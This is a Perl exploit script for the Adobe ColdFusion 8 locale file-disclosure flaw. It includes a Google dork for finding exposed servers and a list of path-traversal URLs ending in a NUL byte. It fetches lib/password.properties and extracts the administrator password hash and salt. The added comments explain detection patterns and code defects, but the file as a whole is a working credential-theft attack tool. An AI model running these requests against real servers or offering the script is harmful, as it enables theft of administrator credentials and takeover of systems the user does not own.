#!/usr/bin/perl
# ColdFusion Locale File Disclosure exploit (without Metasploit)
# Google Dork: intitle:"Index of /CFIDE/" administrator
# Date: 30/07/2013
# Vendor Homepage: http://www.adobe.com/
# Author: D35m0nd142
# Tested on: Adobe ColdFusion 8 (using Backbox Linux operating system)
use
LWP::UserAgent;
use
HTTP::Request;
# HTTP client shared by every probe; the UA string is a Firefox 5 desktop
# identifier rather than the default LWP one.
my $agent = LWP::UserAgent->new(
    agent => 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02',
);

# Base URL of the host under test, taken verbatim from the first argument.
my ($target) = @ARGV;
# Wipe the terminal, show the banner, then pause for a second.
system('clear');
my @banner = (
    '+--------------------------------------------------------+',
    ' ColdFusion Locale File Disclosure exploit ',
    ' created by D35m0nd142 ',
    '+--------------------------------------------------------+',
);
print "$_\n" for @banner;
sleep 1;
# No target on the command line: print the usage line and fail.
unless (length $target) {
    print "Usage: perl cfexploit.pl <target>\n";
    exit 1;
}
# The target is used exactly as given; a missing "http://" scheme is
# neither added nor rejected, so the request simply fails later.
# Probe URLs, tried in order. Each one requests a CFIDE page with a
# `locale=` value made of `../` traversal, a guessed install prefix
# (ColdFusion8, opt/coldfusion8, or a JRun4 deployment) and the file
# lib/password.properties, ended by a `%00` NUL byte. Only the traversal
# depth and the entry page differ between entries. For detection these
# request lines are distinctive: `locale=../` together with `%00` in the
# query string of a /CFIDE/ path is the pattern to match in access logs
# or a WAF rule.
@hosts = (
    # administrator/index.cfm with six to nine levels of traversal
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    # ten levels of traversal, alternating the two install prefixes per page
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    # last entry: a JRun4 multi-server layout
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en"
);
# Walk the probe list in order and stop at the first URL whose response
# looks like a disclosed password.properties. Everything after a hit is
# shell post-processing of the saved body (grep/head/cut/cat), so the
# script assumes a Unix userland; the header says it was tested on
# Backbox Linux.
print "\n... Exploiting ... \n";
foreach $host (@hosts) {
    # Plain GET, no retries. $req actually holds the HTTP::Response that
    # request() returns; the name is misleading.
    $req = $agent->request(HTTP::Request->new(GET => $host));

    # A hit needs a successful (2xx) response, none of three case-sensitive
    # error phrases in the body, and the literal "rdspassword=" string the
    # script expects inside the properties file. The three negative checks
    # presumably exist so a 200 "not found" page is not counted as a hit.
    if (   $req->is_success
        && $req->content !~ /Not Found/
        && $req->content !~ /Page not found/
        && $req->content !~ /Forbidden/
        && $req->content =~ /rdspassword=/ )
    {
        print "\n[+] Vulnerable URL: $host \n\n";

        # Save the whole response body, truncating any earlier content.
        # NOTE(review): bareword handle, 2-arg open and no error check --
        # a failed open is never detected here.
        open(FILE, "> cf_content.txt");
        print FILE $req->content;
        close(FILE);

        # Password lines are pulled out with external grep/head rather than
        # in Perl. The commands are fixed strings, so nothing received from
        # the target reaches the shell as an argument.
        $grep = "grep 'password=' cf_content.txt > passwords.txt";
        $head = "head -n 2 passwords.txt";
        system($grep);
        print "+-------------------------------------------------+\n";
        print " [+] ColdFusion passwords: \n";
        print "___________________________________________________\n";
        system($head);
        print "___________________________________________________\n";
        sleep 1;

        print "\n... Retrieving SALT ... \n\n";
        sleep 1;
        # The salt is read from the hidden <input name="salt"> field of the
        # same saved page: grep the line, take the 4th '='-separated field,
        # then the 2nd '"'-separated field. cf_salt.txt, cf_salt1.txt and
        # cf_salt2.txt are intermediate files and are left on disk.
        $grep = "grep '<input name=\"salt\" type=\"hidden\" value=' cf_content.txt > cf_salt.txt";
        $salt_cut = "cut -d '=' -f 4 cf_salt.txt > cf_salt1.txt";
        $salt_cut1 = "cut -d '\"' -f 2 cf_salt1.txt > cf_salt2.txt";
        system($grep);
        system($salt_cut);
        system($salt_cut1);
        # No trailing newline here; the next print supplies it.
        print "+---------------------------+";
        print "\n [+] SALT: \n";
        print "_____________________________\n";
        system("cat cf_salt2.txt");
        print "_____________________________\n";
        # NOTE(review): sleep takes whole seconds, so 1.3 presumably behaves
        # as 1 -- confirm if the exact pause matters.
        sleep(1.3);
        # The first hit ends the run; remaining probe URLs are not tried.
        exit(0);
    }
    else {
        # A miss appends a marker (without newline) to the same
        # cf_content.txt that a later hit truncates and overwrites, so the
        # markers only survive when no probe succeeds. Same unchecked
        # bareword 2-arg open as above.
        open(FILE, ">> cf_content.txt");
        print FILE "[-] not vulnerable!";
        close(FILE);
    }
}